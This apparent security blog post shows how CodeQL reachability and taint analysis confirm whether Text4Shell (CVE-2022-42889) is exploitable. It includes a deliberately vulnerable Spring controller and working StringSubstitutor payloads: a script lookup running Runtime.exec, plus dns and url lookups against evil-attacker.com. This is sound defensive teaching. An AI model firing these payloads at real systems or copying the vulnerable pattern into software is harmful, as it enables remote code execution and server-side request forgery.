Beyond Traditional SCA: Detecting Exploitable Vulnerabilities Using CodeQL Reachability Analysis (Text4Shell Case Study)

Q: 1. Is a “Negative Result” a guarantee of safety?

A negative result (no path found) is a “valuable negative” because it proves that no static path exists based on the current query. However, it is not an absolute guarantee of safety. Dynamic execution or missing source code for dependencies can hide paths. Reachability analysis should be used to prioritize known risks, not as a reason to ignore foundational security hygiene like patching.

Q: 2. How does CodeQL handle complex sanitization?

CodeQL is excellent at tracking taint, but it requires the researcher to define what acts as a “sanitizer.” If your application uses a custom or complex sanitization logic that hasn’t been modeled in the query, CodeQL might continue to report a path as exploitable even if the data has been neutralized.

Q: 3. Does this replace traditional SCA?

No, the two approaches are complementary. Traditional SCA provides the essential, broad inventory of potential risks, while CodeQL provides the deep, surgical analysis needed to confirm exploitability and prioritize remediation.

Q: 4. What is reachability analysis in vulnerability detection?

Reachability analysis determines whether vulnerable code can actually be executed by tracing application control flow and data flow from attacker-controlled sources to vulnerable sinks.

Q: 5. How does CodeQL reduce false positives in SCA?

CodeQL analyzes how code behaves, not just which libraries are present. It only reports vulnerabilities when real data flow paths exist.

Q: 6. Is Text4Shell always exploitable if the library is present?

No. Text4Shell is only exploitable when untrusted input reaches StringSubstitutor.replace() with vulnerable interpolators enabled.

Q: 7. Can CodeQL prove a vulnerability is not exploitable?

Yes. If no reachable execution path exists, CodeQL provides technical proof that the vulnerability cannot be triggered.

Q: 8. Why is CodeQL considered semantic SCA?

Because it evaluates dependency usage, control flow, and data flow rather than relying on version matching alone.

Overview

Software Composition Analysis tools commonly flag vulnerabilities based on dependency versions alone. This approach produces a high volume of false positives because many vulnerable functions are never executed or never receive untrusted input.

Reachability analysis changes the question from “Is the vulnerable library present?” to “Can attacker-controlled data reach the vulnerable code?”

CodeQL enables this analysis by converting application source code into a semantic database and performing taint tracking across application and dependency boundaries. This allows security teams to confirm exploitability with technical proof rather than assumptions.

Using Text4Shell (CVE-2022-42889) as a real-world example, this article demonstrates how CodeQL data flow analysis identifies whether the vulnerable StringSubstitutor.replace() method is actually reachable and exploitable within an application.

Key Takeaways

Traditional SCA detects vulnerable libraries, not exploitable vulnerabilities. Dependency presence alone does not indicate real-world risk. ‍
CodeQL reachability analysis proves exploitability using data flow paths. Vulnerabilities are only actionable when untrusted input reaches a vulnerable sink. ‍
Negative results are valuable security outcomes. If CodeQL proves no reachable execution path exists, the vulnerability can be safely deprioritized.

I. The Foundational Role of SCA and The Paradigm Shift to Deep Reachability Analysis

Modern software applications are mosaics, built upon layers of open-source packages that constitute an estimated 70–90% of the total codebase [1]. This reliance on third-party dependencies has made Software Composition Analysis (SCA) an indispensable security practice. However, traditional SCA tools, which rely on manifest file scanning (e.g.,pom.xml,package.json ) against public vulnerability databases, are facing a crisis of relevance.

The core issue is noise. A traditional SCA tool reports a vulnerability if a project uses a vulnerable version of a library. This approach often leads to a deluge of false positives - alerts for vulnerabilities that are technically present but functionally impossible to exploit in the specific application context.

This is where Reachability Analysis becomes the paradigm shift. Instead of merely asking, "Is the vulnerable library present?" , we ask the harder, more meaningful question: "Can attacker- controlled data actually reach and execute the vulnerable code?" [2].

CodeQL is the engine that powers this advanced analysis. By transforming source code into a relational database, CodeQL allows security engineers to write precise queries that model the flow of data through the application and its dependencies. This process enables Exploitable Vulnerability Analysis, allowing organizations to cut through the noise and focus their remediation efforts on the vulnerabilities that truly matter [3].

This article uses the Text4Shell vulnerability (CVE-2022-42889) as a case study to demonstrate how CodeQL's data flow reachability analysis provides the technical proof needed to confirm exploitability.

II. Text4Shell: A Case Study in Vulnerable Sinks (CVE-2022- 42889)

The Text4Shell vulnerability, found in org.apache.commons.text versions 1.5 through 1.9, is a classic example of a dangerous feature enabled by default. The StringSubstitutor class is designed to replace variables within a string using dynamic lookups. In the vulnerable versions, the default interpolators included lookups for script,dns, and url[4].

The Exploit Chain: Source to Sink

The vulnerability is triggered when untrusted input is passed to the StringSubstitutor.replace() method. The internal call chain reveals the mechanism:

Example Vulnerable Code Flow

Consider the following Spring Boot controller code, which is a classic example of the vulnerable pattern:

import org.apache.commons.text.StringSubstitutor; 
import org.springframework.web.bind.annotation.*;  
@RestController 
@RequestMapping("text4shell") 
public class Text4ShellController {  
    @RequestMapping(value = "/attack", method = RequestMethod.GET) 
    @ResponseBody 
    public String attack(@RequestParam(defaultValue="5up3r541y4n") String search) { 
        StringSubstitutor interpolator = StringSubstitutor.createInterpolator(); 
        try{ 
            String pwn = interpolator.replace(search); // VULNERABLE SINK 
        } catch(Exception e) { 
            System.out.println(e); 
        } 
        return "Search results for: " + search; 
    } 
}

‍

The data flow in this example is a perfect illustration of the Source-to-Sink path CodeQL is designed to detect:

Source (User Input): The method parameter search is annotated with @RequestParam. This tells CodeQL's standard data flow library that the value of searchis user-controlled and therefore tainted.
Taint Flow: The tainted variable searchis passed directly as the argument to theinterpolator.replace() method.
Sink (Vulnerable Method): Theinterpolator.replace(search) call is the Sink. This method, when called on a StringSubstitutor object created with createInterpolator() in a vulnerable version, initiates the dangerous string substitution.
Exploitation: An attacker sends a request like /text4shell/attack?search=$\{script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}, causing the vulnerable lookup to execute the payload.

This concrete example provides the proof of reachability that CodeQL seeks to confirm.

The generalized internal call chain is:

The replace() method (the Sink) calls substitute(), which scans the input string for expressions like ${prefix:name}. The InterpolatorStringLookup then dynamically dispatches the request to the corresponding lookup handler.

Vulnerable Lookup	Impact	Technical Consequence	Payload
script	Remote Code Execution (RCE)	Allows execution of arbitrary code via scripting languages embedded in the payload. Note: Users running Java 15 or later can avoid the RCE risk because script interpolation is not applied, but other vectors remain. [4]	${script:javascript:java.lang.Runtime.getRuntime().exec("touch /tmp/pwned")}
dns	Information Leakage	Triggers DNS resolution for attacker-controlled domains, useful for exfiltrating data or probing internal networks.	${dns:address:-evil-attacker.com}
url	Server-Side Request Forgery (SSRF)	Forces the application to make requests to internal or external resources based on the payload.	${url:http://evil-attacker.com/payload.txt}

‍

The Foundational Role of Traditional SCA

Traditional SCA provides the critical first step by confirming the presence of a vulnerable version: "commons-text 1.8 is present \to vulnerable." To move from this comprehensive inventory finding to an actionable security finding, a deeper analysis is required. The vulnerability is only exploitable if:

The vulnerable method, StringSubstitutor.replace(...), is reachable by the application's control flow.
Attacker-controlled input flows into the argument of that method.
The vulnerable interpolators (script, dns, url) are not explicitly disabled (which they are not by default in the vulnerable versions).

This makes CVE-2022-42889 an ideal case study for CodeQL-based reachability analysis, as it requires proving all three conditions simultaneously.

Text4Shell vs. Log4Shell: A Crucial Distinction

This issue is fundamentally different from the infamous Log4Shell (CVE-2021-44228). In Log4Shell, string interpolation was possible from the log message body, which commonly contains untrusted input. In the Apache Common Text issue, the relevant method is explicitly intended and clearly documented to perform string interpolation. Consequently, it is much less likely that applications would inadvertently pass in untrusted input without proper validation [6]. This distinction further underscores the need for precise data flow analysis: we must prove that a developer did make the mistake of passing untrusted data to this intended, but dangerous, function.

III. The Nuance: Reachable ≠ Exploitable

A key concept in advanced SCA is the distinction between a vulnerable function being Reachable and the vulnerability being fully Exploitable.

Reachable: The application's control flow can execute the vulnerable method(StringSubstitutor.replace()).
Exploitable: Untrusted data can flow from a user-controlled Source to the vulnerable Sink without being sanitized or guarded by a condition that prevents the exploit.

CodeQL’s strength lies in its ability to model the flow of tainted data (attacker-controlled input). It answers the question: Is there a path from user input to the vulnerable function's argument?

IV. Writing the CodeQL Logic: Proving Taint Reachability

CodeQL's query for Text4Shell is a sophisticated implementation of a Taint Tracking analysis, requiring three components: the Sink, the Source, and the Version Check.

Step 1. Defining the Sink and the Vulnerable Version

The Sink is defined by the methods that accept the string to be substituted. The query predicates can be used to define the Sink method call and ensure the analysis only runs if the dependency version is vulnerable.

The CommonTextsSink class uses hasQualifiedName and getName to precisely target the vulnerable methods, and getArgument(0) to ensure we are tracking the data flowing into the string argument.

/** 
 * Sink: Apache Commons Text StringSubstitutor.replace(...) or StringSubstitutor.replaceIn(...) 
 */ 
class CommonTextsSink extends DataFlow::Node { 
  CommonTextsSink() { 
    exists(MethodCall mc | 
      mc.getMethod().getDeclaringType().hasQualifiedName("org.apache.commons.text", "StringSubstitutor") and 
      ( 
        mc.getMethod().getName() = "replace" or 
        mc.getMethod().getName() = "replaceIn" 
      ) and 
      this.asExpr() = mc.getArgument(0) // The argument is the string that gets interpolated 
    ) 
  }

‍

To ensure high precision, the query integrates a dependency check. This predicate queries the project's dependency graph (e.g., Maven POM files) to confirm the library version is within the vulnerable range: >=1.5 and <1.10.0.

predicate hasVulnerableCommonsTextVersion() { 

  exists(Dependency d, string v | 
    d.getGroup().getValue().toString() = "org.apache.commons" and 
    d.getArtifact().getValue().toString() = "commons-text" and 
    v = d.getVersion().getValue() and
    // affected versions: >=1.5, <1.10.0 
    v.regexpMatch("1\\.[5-9](\\.\\d)?") 
  ) 
}

‍

Step 2. Configuring the Taint Flow

The analysis is configured using the TaintTracking library. The CommonsTextConfig module connects the Source (untrusted input) and the Sink (the vulnerable method call, conditional on the version check).

/** 
 * Taint-tracking configuration 
 */ 
module CommonsTextConfig implements DataFlow::ConfigSig { 
  // Source: Any user-controlled input (e.g., HTTP request, file read) 
  predicate isSource(DataFlow::Node source) { source instanceof ActiveThreatModelSource }  

  // Sink: The vulnerable method call, but only if the version is vulnerable 
  predicate isSink(DataFlow::Node sink) { 
    hasVulnerableCommonsTextVersion() and sink instanceof CommonTextsSink 
  } 
} 
module CommonsTextsFlow = TaintTracking::Global<CommonsTextConfig>;

‍

Step 3. Executing the Query

The final query uses the flowPath predicate to execute the analysis and generate a path-based result.

from CommonsTextsFlow::PathNode source, CommonsTextsFlow::PathNode sink 
where CommonsTextsFlow::flowPath(source, sink) 
select sink.getNode(), source, sink, 
  "User-controlled input flows into StringSubstitutor.replace(), which is vulnerable in this version."

V. The Value of a Negative Result

A vulnerable dependency is not exploitable unless the application can actually execute the vulnerable method. If StringSubstitutor.replace() is never reachable, CVE-2022-42889 cannot be triggered. This is where CodeQL provides its most powerful insight: the valuable negative result. With CodeQL, we can prove: "There is no execution path from any user input to StringSubstitutor.replace() in this codebase."

This is a definitive, technical proof that the vulnerability cannot be triggered, allowing the team to safely de-prioritize the issue. CodeQL’s ability to prove the absence of an execution path for vulnerable code that is never called, guarded by unreachable branches, or used only with constants, significantly reduces noise in large codebases.

VI. Conclusion: Precision and Complementary Analysis

The CodeQL approach extends SCA from a foundational inventory check into a precise, security-critical analysis. By focusing on taint flow and reachability, researchers can confidently identify and prioritize the vulnerabilities that pose a real threat. CodeQL can be used for deep, targeted analysis to confirm exploitability and prioritize remediation efforts.

FAQ’s

1. Is a “Negative Result” a guarantee of safety?